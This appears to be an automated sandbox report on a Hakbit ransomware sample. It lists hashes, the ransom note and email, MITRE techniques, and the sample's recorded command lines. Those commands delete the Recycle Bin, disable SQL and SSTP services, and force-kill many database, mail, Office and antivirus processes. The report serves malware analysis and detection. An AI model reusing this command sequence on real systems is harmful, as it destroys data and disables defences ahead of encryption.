hakbit | 1423053f90855d33858db47f354055b660943104c1c18f848c9b7b415979dc5f

Target

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Size

80KB
MD5

8152a3d0d76f7e968597f4f834fdfa9d
SHA1

c3cf05f3f79851d3c0d4266ab77c8e3e3f88c73e
SHA256

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b
SHA512

eb1a18cb03131466a4152fa2f6874b70c760317148684ca9b95044e50dc9cd19316d6e68e680ce18599114ba73e75264de5dab5afe611165b9c6c0b5f01002b4

Score

10^/10

hakbit ransomware spyware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Family

hakbit

Ransom Note

To recover your data contact the email below potentialenergy@mail.ru Key Identifier: LdmmWU9wdcfM7fZaaclYCCu3xyg3UKEwI4eRAGn0Qwoof5xqHy9Q3hhNC5q477rpNjETRwuMA+2qEQCKUzBzmgDljmGUtmOcLFCqvdUbNUGO6iY7IMRgpAmgGnV4cIqofIU7TWzucra8UecV86wPRFTLEmj8OUSBuU1NgGBZnRDnbN+ZaJdl3vBy+Yp1KCsWNhoPKSWAC+exMWrrsd1uIyJAtW4itL1kWuhwE773CiMIAUTTNWpJSONDlCoc8d4CBThkZrLh4pjuCn9K2qP9xKEPPdl9IJ9LZMPN21wgQ+wHHPcKogfSZNwPzDuhZeKfCyv62PLrgK1+0ZTAP4y7E4Qj0SUcMsUwwoJmTBjBaz5SwNoaMIk3oEo/Xu1bSyO14WmMyMO4B4jlFTEFKZZpyS8T5LM+Tj/KvBdzpAQ6MfPslEGlFiYr5gakLgkx6DZCtsyC9S/XOMo39dKtQYpMJaA+GrcrK7iL+4BVPmASlIE2I2/+fgu0qGsqDTEk+WewgB7v+oiareMb9TwpKXG6B9cudHm5pfHRgCClJYd9sPpQhGF1fI42DU14ibwLz6M7isKFn+x7PprXMOSRxbtpfldANAiUaC9y0wsezGntGtm3xChuNKFD0P3fBNTQM+DTodmX0bAfBln1TGVAMMMoj+qm6scVls/ZK0BZAbKe85g= Number of files that were processed is: 1218

Emails

potentialenergy@mail.ru

Signatures

Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.
ransomware hakbit

Drops startup file 1 IoCs

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.

Kills process with taskkill 47 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
4432	taskkill.exe
4296	taskkill.exe
2364	taskkill.exe
664	taskkill.exe
5680	taskkill.exe
712	taskkill.exe
4524	taskkill.exe
1616	taskkill.exe
828	taskkill.exe
4624	taskkill.exe
5216	taskkill.exe
2676	taskkill.exe
216	taskkill.exe
2268	taskkill.exe
3656	taskkill.exe
5136	taskkill.exe
5180	taskkill.exe
4300	taskkill.exe
636	taskkill.exe
2608	taskkill.exe
2116	taskkill.exe
1396	taskkill.exe
4356	taskkill.exe
3896	taskkill.exe
5536	taskkill.exe
1436	taskkill.exe
3920	taskkill.exe
5320	taskkill.exe
3620	taskkill.exe
4244	taskkill.exe
4052	taskkill.exe
380	taskkill.exe
1620	taskkill.exe
1876	taskkill.exe
4596	taskkill.exe
208	taskkill.exe
5504	taskkill.exe
5708	taskkill.exe
4280	taskkill.exe
4192	taskkill.exe
528	taskkill.exe
2380	taskkill.exe
4212	taskkill.exe
4228	taskkill.exe
5416	taskkill.exe
4376	taskkill.exe
5380	taskkill.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

6452 notepad.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4976 PING.EXE

pid	process
6452	notepad.exe

pid	process
4976	PING.EXE

Suspicious behavior: EnumeratesProcesses 24328 IoCs

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

pid	process
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Token: SeDebugPrivilege	4244	taskkill.exe
Token: SeDebugPrivilege	4280	taskkill.exe
Token: SeDebugPrivilege	4300	taskkill.exe
Token: SeDebugPrivilege	712	taskkill.exe
Token: SeDebugPrivilege	4192	taskkill.exe
Token: SeDebugPrivilege	4432	taskkill.exe
Token: SeDebugPrivilege	4052	taskkill.exe
Token: SeDebugPrivilege	380	taskkill.exe
Token: SeDebugPrivilege	4524	taskkill.exe
Token: SeDebugPrivilege	528	taskkill.exe
Token: SeDebugPrivilege	636	taskkill.exe
Token: SeDebugPrivilege	1620	taskkill.exe
Token: SeDebugPrivilege	1436	taskkill.exe
Token: SeDebugPrivilege	1876	taskkill.exe
Token: SeDebugPrivilege	2380	taskkill.exe
Token: SeDebugPrivilege	2116	taskkill.exe
Token: SeDebugPrivilege	2608	taskkill.exe
Token: SeDebugPrivilege	216	taskkill.exe
Token: SeDebugPrivilege	2676	taskkill.exe
Token: SeDebugPrivilege	1396	taskkill.exe
Token: SeDebugPrivilege	4596	taskkill.exe
Token: SeDebugPrivilege	2268	taskkill.exe
Token: SeDebugPrivilege	3920	taskkill.exe
Token: SeDebugPrivilege	1616	taskkill.exe
Token: SeDebugPrivilege	4212	taskkill.exe
Token: SeDebugPrivilege	4296	taskkill.exe
Token: SeDebugPrivilege	2364	taskkill.exe
Token: SeDebugPrivilege	4228	taskkill.exe
Token: SeDebugPrivilege	828	taskkill.exe
Token: SeDebugPrivilege	3656	taskkill.exe
Token: SeDebugPrivilege	3896	taskkill.exe
Token: SeDebugPrivilege	208	taskkill.exe
Token: SeDebugPrivilege	4624	taskkill.exe
Token: SeDebugPrivilege	4376	taskkill.exe
Token: SeDebugPrivilege	3620	taskkill.exe
Token: SeDebugPrivilege	664	taskkill.exe
Token: SeDebugPrivilege	5136	taskkill.exe
Token: SeDebugPrivilege	5180	taskkill.exe
Token: SeDebugPrivilege	5216	taskkill.exe
Token: SeDebugPrivilege	5320	taskkill.exe
Token: SeDebugPrivilege	5416	taskkill.exe
Token: SeDebugPrivilege	5380	taskkill.exe
Token: SeDebugPrivilege	5536	taskkill.exe
Token: SeDebugPrivilege	5504	taskkill.exe
Token: SeDebugPrivilege	5680	taskkill.exe
Token: SeDebugPrivilege	5708	taskkill.exe
Token: SeDebugPrivilege	5740	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

pid process

4816 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

pid process

4816 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Suspicious use of WriteProcessMemory 118 IoCs

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

description	pid	process	target process
PID 4816 wrote to memory of 4128	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 4816 wrote to memory of 4128	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 4816 wrote to memory of 3468	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	cmd.exe
PID 4816 wrote to memory of 3468	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	cmd.exe
PID 4816 wrote to memory of 3568	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 4816 wrote to memory of 3568	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 4816 wrote to memory of 3560	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 4816 wrote to memory of 3560	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 4816 wrote to memory of 3824	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 4816 wrote to memory of 3824	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 4816 wrote to memory of 4244	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 4244	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 4280	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 4280	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 4300	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 4300	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 712	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 712	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 4192	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 4192	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 4432	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 4432	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 4052	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 4052	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 380	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 380	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 4524	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 4524	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 528	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 528	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 636	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 636	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 1436	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 1436	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 1620	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 1620	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 1876	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 1876	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 2380	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 2380	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 2608	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 2608	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 2116	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 2116	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 2676	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 2676	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 216	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 216	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 1396	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 1396	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 4356	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	Conhost.exe
PID 4816 wrote to memory of 4356	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	Conhost.exe
PID 4816 wrote to memory of 4596	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 4596	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 2268	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 2268	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 3920	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 3920	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 1616	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 1616	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 4212	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 4212	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 4296	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4816 wrote to memory of 4296	4816	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe

C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
"C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"
1⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4816

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
2⤵
PID:4128

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
2⤵
PID:3468

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:3568

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SstpSvc start= disabled
2⤵
PID:3824

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4244

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4280

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLWriter start= disabled
2⤵
PID:3560

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4300

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:712

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4192

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4432

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4052

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:380

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM steam.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4524

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:528

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM excel.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:636

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1436

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1876

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2608

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2380

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2116

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2676

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:216

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1396

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
2⤵
- Kills process with taskkill
PID:4356

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4596

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2268

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3920

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1616

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4212

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4296

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2364

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
2⤵
- Kills process with taskkill
